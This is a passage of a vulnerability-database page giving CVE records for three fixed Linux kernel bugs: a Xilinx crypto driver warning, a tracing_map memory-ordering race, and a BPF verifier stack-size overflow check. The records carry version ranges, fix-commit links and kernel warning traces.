"drivers/crypto/xilinx/zynqmp-aes-gcm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: xilinx - call finalize with bh disabled\n\nWhen calling crypto_finalize_request, BH should be disabled to avoid\ntriggering the following calltrace:\n\n ------------[ cut here ]------------\n WARNING: CPU: 2 PID: 74 at crypto/crypto_engine.c:58 crypto_finalize_request+0xa0/0x118\n Modules linked in: cryptodev(O)\n CPU: 2 PID: 74 Comm: firmware:zynqmp Tainted: G O 6.8.0-rc1-yocto-standard #323\n Hardware name: ZynqMP ZCU102 Rev1.0 (DT)\n pstate: 40000005 (nZcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : crypto_finalize_request+0xa0/0x118\n lr : crypto_finalize_request+0x104/0x118\n sp : ffffffc085353ce0\n x29: ffffffc085353ce0 x28: 0000000000000000 x27: ffffff8808ea8688\n x26: ffffffc081715038 x25: 0000000000000000 x24: ffffff880100db00\n x23: ffffff880100da80 x22: 0000000000000000 x21: 0000000000000000\n x20: ffffff8805b14000 x19: ffffff880100da80 x18: 0000000000010450\n x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\n x14: 0000000000000003 x13: 0000000000000000 x12: ffffff880100dad0\n x11: 0000000000000000 x10: ffffffc0832dcd08 x9 : ffffffc0812416d8\n x8 : 00000000000001f4 x7 : ffffffc0830d2830 x6 : 0000000000000001\n x5 : ffffffc082091000 x4 : ffffffc082091658 x3 : 0000000000000000\n x2 : ffffffc7f9653000 x1 : 0000000000000000 x0 : ffffff8802d20000\n Call trace:\n crypto_finalize_request+0xa0/0x118\n crypto_finalize_aead_request+0x18/0x30\n zynqmp_handle_aes_req+0xcc/0x388\n crypto_pump_work+0x168/0x2d8\n kthread_worker_fn+0xfc/0x3a0\n kthread+0x118/0x138\n ret_from_fork+0x10/0x20\n irq event stamp: 40\n hardirqs last enabled at (39): [\u003cffffffc0812416f8\u003e] _raw_spin_unlock_irqrestore+0x70/0xb0\n hardirqs last disabled at (40): [\u003cffffffc08122d208\u003e] el1_dbg+0x28/0x90\n softirqs last enabled at (36): [\u003cffffffc080017dec\u003e] kernel_neon_begin+0x8c/0xf0\n softirqs last disabled at (34): [\u003cffffffc080017dc0\u003e] kernel_neon_begin+0x60/0xf0\n ---[ end trace 0000000000000000 ]---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:39.909Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8a01335aedc50a66d04dd39203c89f4bc8042596"
},
{
"url": "https://git.kernel.org/stable/c/03e6d4e948432a61b35783323b6ab2be071d2619"
},
{
"url": "https://git.kernel.org/stable/c/a71f66bd5f7b9b35a8aaa49e29565eca66299399"
},
{
"url": "https://git.kernel.org/stable/c/23bc89fdce71124cd2126fc919c7076e7cb489cf"
},
{
"url": "https://git.kernel.org/stable/c/9db89b1fb85557892e6681724b367287de5f9f20"
},
{
"url": "https://git.kernel.org/stable/c/dbf291d8ffffb70f48286176a15c6c54f0bb0743"
},
{
"url": "https://git.kernel.org/stable/c/a853450bf4c752e664abab0b2fad395b7ad7701c"
}
],
"title": "crypto: xilinx - call finalize with bh disabled",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26877",
"datePublished": "2024-04-17T10:27:35.197Z",
"dateReserved": "2024-02-19T14:20:24.185Z",
"dateUpdated": "2025-05-04T08:58:39.909Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26645 (GCVE-0-2024-26645)
Vulnerability from cvelistv5
Published
2024-03-26 15:17
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tracing: Ensure visibility when inserting an element into tracing_map
Running the following two commands in parallel on a multi-processor
AArch64 machine can sporadically produce an unexpected warning about
duplicate histogram entries:
$ while true; do
echo hist:key=id.syscall:val=hitcount > \
/sys/kernel/debug/tracing/events/raw_syscalls/sys_enter/trigger
cat /sys/kernel/debug/tracing/events/raw_syscalls/sys_enter/hist
sleep 0.001
done
$ stress-ng --sysbadaddr $(nproc)
The warning looks as follows:
[ 2911.172474] ------------[ cut here ]------------
[ 2911.173111] Duplicates detected: 1
[ 2911.173574] WARNING: CPU: 2 PID: 12247 at kernel/trace/tracing_map.c:983 tracing_map_sort_entries+0x3e0/0x408
[ 2911.174702] Modules linked in: iscsi_ibft(E) iscsi_boot_sysfs(E) rfkill(E) af_packet(E) nls_iso8859_1(E) nls_cp437(E) vfat(E) fat(E) ena(E) tiny_power_button(E) qemu_fw_cfg(E) button(E) fuse(E) efi_pstore(E) ip_tables(E) x_tables(E) xfs(E) libcrc32c(E) aes_ce_blk(E) aes_ce_cipher(E) crct10dif_ce(E) polyval_ce(E) polyval_generic(E) ghash_ce(E) gf128mul(E) sm4_ce_gcm(E) sm4_ce_ccm(E) sm4_ce(E) sm4_ce_cipher(E) sm4(E) sm3_ce(E) sm3(E) sha3_ce(E) sha512_ce(E) sha512_arm64(E) sha2_ce(E) sha256_arm64(E) nvme(E) sha1_ce(E) nvme_core(E) nvme_auth(E) t10_pi(E) sg(E) scsi_mod(E) scsi_common(E) efivarfs(E)
[ 2911.174738] Unloaded tainted modules: cppc_cpufreq(E):1
[ 2911.180985] CPU: 2 PID: 12247 Comm: cat Kdump: loaded Tainted: G E 6.7.0-default #2 1b58bbb22c97e4399dc09f92d309344f69c44a01
[ 2911.182398] Hardware name: Amazon EC2 c7g.8xlarge/, BIOS 1.0 11/1/2018
[ 2911.183208] pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)
[ 2911.184038] pc : tracing_map_sort_entries+0x3e0/0x408
[ 2911.184667] lr : tracing_map_sort_entries+0x3e0/0x408
[ 2911.185310] sp : ffff8000a1513900
[ 2911.185750] x29: ffff8000a1513900 x28: ffff0003f272fe80 x27: 0000000000000001
[ 2911.186600] x26: ffff0003f272fe80 x25: 0000000000000030 x24: 0000000000000008
[ 2911.187458] x23: ffff0003c5788000 x22: ffff0003c16710c8 x21: ffff80008017f180
[ 2911.188310] x20: ffff80008017f000 x19: ffff80008017f180 x18: ffffffffffffffff
[ 2911.189160] x17: 0000000000000000 x16: 0000000000000000 x15: ffff8000a15134b8
[ 2911.190015] x14: 0000000000000000 x13: 205d373432323154 x12: 5b5d313131333731
[ 2911.190844] x11: 00000000fffeffff x10: 00000000fffeffff x9 : ffffd1b78274a13c
[ 2911.191716] x8 : 000000000017ffe8 x7 : c0000000fffeffff x6 : 000000000057ffa8
[ 2911.192554] x5 : ffff0012f6c24ec0 x4 : 0000000000000000 x3 : ffff2e5b72b5d000
[ 2911.193404] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff0003ff254480
[ 2911.194259] Call trace:
[ 2911.194626] tracing_map_sort_entries+0x3e0/0x408
[ 2911.195220] hist_show+0x124/0x800
[ 2911.195692] seq_read_iter+0x1d4/0x4e8
[ 2911.196193] seq_read+0xe8/0x138
[ 2911.196638] vfs_read+0xc8/0x300
[ 2911.197078] ksys_read+0x70/0x108
[ 2911.197534] __arm64_sys_read+0x24/0x38
[ 2911.198046] invoke_syscall+0x78/0x108
[ 2911.198553] el0_svc_common.constprop.0+0xd0/0xf8
[ 2911.199157] do_el0_svc+0x28/0x40
[ 2911.199613] el0_svc+0x40/0x178
[ 2911.200048] el0t_64_sync_handler+0x13c/0x158
[ 2911.200621] el0t_64_sync+0x1a8/0x1b0
[ 2911.201115] ---[ end trace 0000000000000000 ]---
The problem appears to be caused by CPU reordering of writes issued from
__tracing_map_insert().
The check for the presence of an element with a given key in this
function is:
val = READ_ONCE(entry->val);
if (val && keys_match(key, val->key, map->key_size)) ...
The write of a new entry is:
elt = get_free_elt(map);
memcpy(elt->key, key, map->key_size);
entry->val = elt;
The "memcpy(elt->key, key, map->key_size);" and "entry->val = elt;"
stores may become visible in the reversed order on another CPU. This
second CPU might then incorrectly determine that a new key doesn't match
an already present val->key and subse
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c193707dde77ace92a649cd59a17e105e2fbeaef Version: c193707dde77ace92a649cd59a17e105e2fbeaef Version: c193707dde77ace92a649cd59a17e105e2fbeaef Version: c193707dde77ace92a649cd59a17e105e2fbeaef Version: c193707dde77ace92a649cd59a17e105e2fbeaef Version: c193707dde77ace92a649cd59a17e105e2fbeaef Version: c193707dde77ace92a649cd59a17e105e2fbeaef Version: c193707dde77ace92a649cd59a17e105e2fbeaef |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26645",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-29T14:23:28.207860Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:27.214Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.581Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5022b331c041e8c54b9a6a3251579bd1e8c0fc0b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dad9b28f675ed99b4dec261db2a397efeb80b74c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ef70dfa0b1e5084f32635156c9a5c795352ad860"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aef1cb00856ccfd614467cfb50b791278992e177"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f4f7e696db0274ff560482cc52eddbf0551d4b7a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a1eebe76e187dbe11ca299f8dbb6e45d5b1889e7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bf4aeff7da85c3becd39fb73bac94122331c30fb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2b44760609e9eaafc9d234a6883d042fc21132a7"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/trace/tracing_map.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5022b331c041e8c54b9a6a3251579bd1e8c0fc0b",
"status": "affected",
"version": "c193707dde77ace92a649cd59a17e105e2fbeaef",
"versionType": "git"
},
{
"lessThan": "dad9b28f675ed99b4dec261db2a397efeb80b74c",
"status": "affected",
"version": "c193707dde77ace92a649cd59a17e105e2fbeaef",
"versionType": "git"
},
{
"lessThan": "ef70dfa0b1e5084f32635156c9a5c795352ad860",
"status": "affected",
"version": "c193707dde77ace92a649cd59a17e105e2fbeaef",
"versionType": "git"
},
{
"lessThan": "aef1cb00856ccfd614467cfb50b791278992e177",
"status": "affected",
"version": "c193707dde77ace92a649cd59a17e105e2fbeaef",
"versionType": "git"
},
{
"lessThan": "f4f7e696db0274ff560482cc52eddbf0551d4b7a",
"status": "affected",
"version": "c193707dde77ace92a649cd59a17e105e2fbeaef",
"versionType": "git"
},
{
"lessThan": "a1eebe76e187dbe11ca299f8dbb6e45d5b1889e7",
"status": "affected",
"version": "c193707dde77ace92a649cd59a17e105e2fbeaef",
"versionType": "git"
},
{
"lessThan": "bf4aeff7da85c3becd39fb73bac94122331c30fb",
"status": "affected",
"version": "c193707dde77ace92a649cd59a17e105e2fbeaef",
"versionType": "git"
},
{
"lessThan": "2b44760609e9eaafc9d234a6883d042fc21132a7",
"status": "affected",
"version": "c193707dde77ace92a649cd59a17e105e2fbeaef",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/trace/tracing_map.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.17"
},
{
"lessThan": "4.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Ensure visibility when inserting an element into tracing_map\n\nRunning the following two commands in parallel on a multi-processor\nAArch64 machine can sporadically produce an unexpected warning about\nduplicate histogram entries:\n\n $ while true; do\n echo hist:key=id.syscall:val=hitcount \u003e \\\n /sys/kernel/debug/tracing/events/raw_syscalls/sys_enter/trigger\n cat /sys/kernel/debug/tracing/events/raw_syscalls/sys_enter/hist\n sleep 0.001\n done\n $ stress-ng --sysbadaddr $(nproc)\n\nThe warning looks as follows:\n\n[ 2911.172474] ------------[ cut here ]------------\n[ 2911.173111] Duplicates detected: 1\n[ 2911.173574] WARNING: CPU: 2 PID: 12247 at kernel/trace/tracing_map.c:983 tracing_map_sort_entries+0x3e0/0x408\n[ 2911.174702] Modules linked in: iscsi_ibft(E) iscsi_boot_sysfs(E) rfkill(E) af_packet(E) nls_iso8859_1(E) nls_cp437(E) vfat(E) fat(E) ena(E) tiny_power_button(E) qemu_fw_cfg(E) button(E) fuse(E) efi_pstore(E) ip_tables(E) x_tables(E) xfs(E) libcrc32c(E) aes_ce_blk(E) aes_ce_cipher(E) crct10dif_ce(E) polyval_ce(E) polyval_generic(E) ghash_ce(E) gf128mul(E) sm4_ce_gcm(E) sm4_ce_ccm(E) sm4_ce(E) sm4_ce_cipher(E) sm4(E) sm3_ce(E) sm3(E) sha3_ce(E) sha512_ce(E) sha512_arm64(E) sha2_ce(E) sha256_arm64(E) nvme(E) sha1_ce(E) nvme_core(E) nvme_auth(E) t10_pi(E) sg(E) scsi_mod(E) scsi_common(E) efivarfs(E)\n[ 2911.174738] Unloaded tainted modules: cppc_cpufreq(E):1\n[ 2911.180985] CPU: 2 PID: 12247 Comm: cat Kdump: loaded Tainted: G E 6.7.0-default #2 1b58bbb22c97e4399dc09f92d309344f69c44a01\n[ 2911.182398] Hardware name: Amazon EC2 c7g.8xlarge/, BIOS 1.0 11/1/2018\n[ 2911.183208] pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n[ 2911.184038] pc : tracing_map_sort_entries+0x3e0/0x408\n[ 2911.184667] lr : tracing_map_sort_entries+0x3e0/0x408\n[ 2911.185310] sp : ffff8000a1513900\n[ 2911.185750] x29: ffff8000a1513900 x28: ffff0003f272fe80 x27: 0000000000000001\n[ 2911.186600] x26: ffff0003f272fe80 x25: 0000000000000030 x24: 0000000000000008\n[ 2911.187458] x23: ffff0003c5788000 x22: ffff0003c16710c8 x21: ffff80008017f180\n[ 2911.188310] x20: ffff80008017f000 x19: ffff80008017f180 x18: ffffffffffffffff\n[ 2911.189160] x17: 0000000000000000 x16: 0000000000000000 x15: ffff8000a15134b8\n[ 2911.190015] x14: 0000000000000000 x13: 205d373432323154 x12: 5b5d313131333731\n[ 2911.190844] x11: 00000000fffeffff x10: 00000000fffeffff x9 : ffffd1b78274a13c\n[ 2911.191716] x8 : 000000000017ffe8 x7 : c0000000fffeffff x6 : 000000000057ffa8\n[ 2911.192554] x5 : ffff0012f6c24ec0 x4 : 0000000000000000 x3 : ffff2e5b72b5d000\n[ 2911.193404] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff0003ff254480\n[ 2911.194259] Call trace:\n[ 2911.194626] tracing_map_sort_entries+0x3e0/0x408\n[ 2911.195220] hist_show+0x124/0x800\n[ 2911.195692] seq_read_iter+0x1d4/0x4e8\n[ 2911.196193] seq_read+0xe8/0x138\n[ 2911.196638] vfs_read+0xc8/0x300\n[ 2911.197078] ksys_read+0x70/0x108\n[ 2911.197534] __arm64_sys_read+0x24/0x38\n[ 2911.198046] invoke_syscall+0x78/0x108\n[ 2911.198553] el0_svc_common.constprop.0+0xd0/0xf8\n[ 2911.199157] do_el0_svc+0x28/0x40\n[ 2911.199613] el0_svc+0x40/0x178\n[ 2911.200048] el0t_64_sync_handler+0x13c/0x158\n[ 2911.200621] el0t_64_sync+0x1a8/0x1b0\n[ 2911.201115] ---[ end trace 0000000000000000 ]---\n\nThe problem appears to be caused by CPU reordering of writes issued from\n__tracing_map_insert().\n\nThe check for the presence of an element with a given key in this\nfunction is:\n\n val = READ_ONCE(entry-\u003eval);\n if (val \u0026\u0026 keys_match(key, val-\u003ekey, map-\u003ekey_size)) ...\n\nThe write of a new entry is:\n\n elt = get_free_elt(map);\n memcpy(elt-\u003ekey, key, map-\u003ekey_size);\n entry-\u003eval = elt;\n\nThe \"memcpy(elt-\u003ekey, key, map-\u003ekey_size);\" and \"entry-\u003eval = elt;\"\nstores may become visible in the reversed order on another CPU. This\nsecond CPU might then incorrectly determine that a new key doesn\u0027t match\nan already present val-\u003ekey and subse\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:59.583Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5022b331c041e8c54b9a6a3251579bd1e8c0fc0b"
},
{
"url": "https://git.kernel.org/stable/c/dad9b28f675ed99b4dec261db2a397efeb80b74c"
},
{
"url": "https://git.kernel.org/stable/c/ef70dfa0b1e5084f32635156c9a5c795352ad860"
},
{
"url": "https://git.kernel.org/stable/c/aef1cb00856ccfd614467cfb50b791278992e177"
},
{
"url": "https://git.kernel.org/stable/c/f4f7e696db0274ff560482cc52eddbf0551d4b7a"
},
{
"url": "https://git.kernel.org/stable/c/a1eebe76e187dbe11ca299f8dbb6e45d5b1889e7"
},
{
"url": "https://git.kernel.org/stable/c/bf4aeff7da85c3becd39fb73bac94122331c30fb"
},
{
"url": "https://git.kernel.org/stable/c/2b44760609e9eaafc9d234a6883d042fc21132a7"
}
],
"title": "tracing: Ensure visibility when inserting an element into tracing_map",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26645",
"datePublished": "2024-03-26T15:17:18.203Z",
"dateReserved": "2024-02-19T14:20:24.138Z",
"dateUpdated": "2025-05-04T08:52:59.583Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35905 (GCVE-0-2024-35905)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Protect against int overflow for stack access size
This patch re-introduces protection against the size of access to stack
memory being negative; the access size can appear negative as a result
of overflowing its signed int representation. This should not actually
happen, as there are other protections along the way, but we should
protect against it anyway. One code path was missing such protections
(fixed in the previous patch in the series), causing out-of-bounds array
accesses in check_stack_range_initialized(). This patch causes the
verification of a program with such a non-sensical access size to fail.
This check used to exist in a more indirect way, but was inadvertendly
removed in a833a17aeac7.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: afea95d319ccb4ad2060dece9ac5e2e364dec543 Version: 02962684258eb53f414a8a59854767be526e6abb Version: b1d4d54d32ce6342f5faffe71bae736540ce7cb5 Version: 08b91babccbb168353f8d43fea0ed28a4cad568c Version: a833a17aeac73b33f79433d7cee68d5cafd71e4f Version: a833a17aeac73b33f79433d7cee68d5cafd71e4f Version: 1858b8a331937f3976d8482cd5f6e1f945294ad3 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35905",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-21T15:34:20.280116Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:52.056Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.025Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9970e059af471478455f9534e8c3db82f8c5496d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/37dc1718dc0c4392dbfcb9adec22a776e745dd69"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98cdac206b112bec63852e94802791e316acc2c1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3f0784b2f1eb9147973d8c43ba085c5fdf44ff69"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/203a68151e8eeb331d4a64ab78303f3a15faf103"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ecc6a2101840177e57c925c102d2d29f260d37c8"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/verifier.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9970e059af471478455f9534e8c3db82f8c5496d",
"status": "affected",
"version": "afea95d319ccb4ad2060dece9ac5e2e364dec543",
"versionType": "git"
},
{
"lessThan": "37dc1718dc0c4392dbfcb9adec22a776e745dd69",
"status": "affected",
"version": "02962684258eb53f414a8a59854767be526e6abb",
"versionType": "git"
},
{
"lessThan": "98cdac206b112bec63852e94802791e316acc2c1",
"status": "affected",
"version": "b1d4d54d32ce6342f5faffe71bae736540ce7cb5",
"versionType": "git"
},
{
"lessThan": "3f0784b2f1eb9147973d8c43ba085c5fdf44ff69",
"status": "affected",
"version": "08b91babccbb168353f8d43fea0ed28a4cad568c",
"versionType": "git"
},
{
"lessThan": "203a68151e8eeb331d4a64ab78303f3a15faf103",
"status": "affected",
"version": "a833a17aeac73b33f79433d7cee68d5cafd71e4f",
"versionType": "git"
},
{
"lessThan": "ecc6a2101840177e57c925c102d2d29f260d37c8",
"status": "affected",
"version": "a833a17aeac73b33f79433d7cee68d5cafd71e4f",
"versionType": "git"
},
{
"status": "affected",
"version": "1858b8a331937f3976d8482cd5f6e1f945294ad3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/bpf/verifier.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.8"
},
{
"lessThan": "6.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.209",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
